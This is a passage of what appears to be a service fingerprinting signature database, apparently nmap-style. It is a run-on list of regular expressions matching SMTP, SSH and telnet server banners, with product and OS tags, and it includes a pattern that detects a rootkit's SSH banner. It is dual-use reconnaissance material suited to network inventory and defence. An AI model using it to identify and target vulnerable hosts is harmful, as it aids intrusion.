Germany\)\r\n +220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) +220[- ][^ ]+ Smail-([^ ]+) +220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n +220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n +220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n +220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n +220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n +220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n +220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) +220 ([-\w_.]+) ESMTP postfix NO UCE\r\n +220 ([-\w_.]+) SMTPD Server - Postfix\r\n +220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n +220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n +220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n +220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n +220 ESMTP Lyris service ready\r\n +220 ESMTP Lyris ListManager service ready\r\n +220 ([-\w_.]+) SMTP Ready 12\.\r\n +220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n +220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n +220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n +220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n +220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready +220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n +220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); +421 Sorry, SMTP server too busy right now \(193\); try again later\r\n +220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n +220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] +220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n +220 ([-\w_.]+) mailfront ESMTP\r\n +220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n +220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n +220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n +220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n +220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n +220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n +500 Permission denied - closing connection\.\r\n +220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n +220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n +220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n +220 LiteMail SMTP Server Ready\.\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow\) ready +220 network-box ESMTP\r\n +220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +220 ([-\w_.]+) AntiVir MailGate\r\n +220 server ESMTP KEN! v([\d.]+); .*\r\n +220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n +220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 +220 shttp\.srv Simple Mail Transfer Service Ready\r\n +501 Domain must resolve\r\n +220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n +220 mailmatrix SMTP Server \(Mail Matrix Server\) ready +220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); +220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n +220 ([-\w_.]+); .* \+\d+\r\n +421 unable to read controls \(#4\.3\.0\)\r\n +554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n +rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n +220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n +220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), +220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail +220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready +220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n +220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n +220 DP-3510\r\n +220 ([-\w_.]+) Axigen ESMTP ready\r\n +421 Unexpected log failure, please try later\r\n +220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( +220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ +554 ([-\w_.]+) ESMTP not accepting messages\r\n +220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready +220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n +220 ShareMailPro SMTP Server Ready \r\n +220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready +220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n +220 Service ready KM([\w._-]+) smtpd\r\n +220 ([\w_.-]+) cqgreylist - minimal smptd\r\n +220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); +220 DP-1820E\r\n +220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n +220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) +220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n +220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n +220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready +421 Service not available, closing transmission channel\r\n +421 Service not available, closing transmission channel \r\n +220 ([\w_.-]+) ESMTP OpenSMTPD\r\n +220 ([\w_.-]+) ESMTP Citadel server ready\.\r\n +220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n +220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n +220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n +220 ([\w._-]+) running IBM VM SMTP Level (\d+) on +421 4\.3\.2 Service not available\r\n +220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n +220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n +220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n +220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n +220 ESMTP smtprelay service ready\.\r\n +220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n +220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n +421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n +220 AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n +220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n +554 ([\d.]+) ([-\w_.]+) No mail service\r\n +220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n +220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n +220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( +220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n +NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n +220 ([-\w_.]+) ESMTP bitdefender +220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n +220 [-\w_.]+ avast! SMTP proxy ready\.\r\n +220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n +554 You are not allowed to connect\.\r\n +220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n +220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n +220 ([\w._-]+)\.ARK Sendmail ready\. \r\n +421 too many connections\r\n +220 ([-\w_.]+) ESMTP Service ready\r\n +220 ([\w._-]+) AVKSMTP Server\r\n +220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) +220[\s-].*?E?SMTP[^\r]*\r\n +550 (\d.\d.\d) ([^\r\n]+) +Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n +220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n +220 QuickPage v(\d[-.\w]+) SNPP server ready at +250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n +SPMD_ACK\0\0\x01\0\x01 +SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n +SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n +SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n +SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n +SSH-([\d.]+)-SSH Compatible Server\r?\n +SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n +SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell +sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- +sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n +SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) +SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n +SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-overwrite-base +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n +SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n +SSH-([\d.]+)-Nortel\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n +\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v +SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n +SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 +SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 +SSH-([\d.]+)-Sun_SSH_(\S+) +SSH-([\d.]+)-meow roototkt by rebel +SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n +SSH-(\d[\d.]*)-(Server-V)\r?\n +SSH-(\d[\d.]*)-(Server-VI)\r?\n +SSH-(\d[\d.]*)-(Server-VII)\r?\n +SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n +\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n +SSH-2\.0-0\.0 \r?\n +SSH-([\d.]+)-([\w.]+) VShell\r?\n +SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n +SSH-1\.5-X\r?\n +Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n +SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-cryptlib\r?\n +SSH-2\.0-1\.0 Radware SSH \r?\n +SSH-2\.0-(\d{8,12})\r?\n +SSH-2\.0-Twisted\r?\n +SSH-2\.0-PGP\r?\n +SSH-([\d.]+)-libssh-([-\w.]+)\r?\n +SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n +SSH-([\d.]+)-VRP-([\d.]+)\r?\n +SSH-([\d.]+)-lancom\r?\n +SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd +SSH-([\d.]+)-AOS_SSH\r?\n +SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n +SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n +SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n +SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n +SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd +SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n +SSH-([\d.]+)-([\w.]+)rad\r?\n +SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n +SSH-1\.5-SSH\.0\.1\r?\n +SSH-([\d.]+)-Ingrian_SSH\r?\n +SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n +SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n +SSH-([\d.]+)-Zyxel SSH server\r?\n +SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n +SSH-2\.0-SSH_0\.2\r?\n +SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n +SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n +Could not load host key\. Closing connection\.\.\. +SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n +SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n +SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! +SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n +SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n +SSH-([\d.]+)-1\.00\r\n +SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n +SSH-([\d.]+)-ROSSSH\r\n +SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n +SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n +SSH-([\d.]+)-XXXX\r\n +SSH-([\d.]+)-xxx\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n +SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n +SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n +SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n +Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n +unknown command \r\nunknown command \r\n +\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n +RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n +\0\0\0\x0bSynergy\0\x01\0 +\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n +You are not welcome to use (\w+) from [\w._-]+\.\n +welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f +\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: +\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> +\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: +\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: +220 SL4NT viewer service ready\r\n250 Currently connected channels: +\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ +\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n +\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: +\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r +\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: +login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\r\npassword: +\xff\xfb\x01\xff\xfd\x18\xff\xfd# +\xff\xfb\x03\xff\xfb\x01\r\nPassword: +\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n +Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: +\xff\xfb\x01\xff\xfb\x03\r\nUsername: +\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 +\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n +\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: +\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP +\xff\xfe%\xff\xfd\x18 +\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +\r\nRaptor Firewall Secure Gateway\.\r\n +\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b +\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* \*\x1b\[2;1H +\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r +Check Point FireWall-1 authenticated Telnet server running on +\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> +\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: +\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) +\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) +\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb +Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes +\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 +\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: +\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n +\xff\xfd\x18 +\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ +\xff\xfb\x01\n\rUser Name : +\xff\xfd\ +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd +\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> +\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) +\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: +\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: +\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: +\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd +\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: +\xff\xfd\(| p|IBM OS/390 or SNA telnetd +\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\r\nVxWorks login: \xff\xfb\x01 +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: +\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> 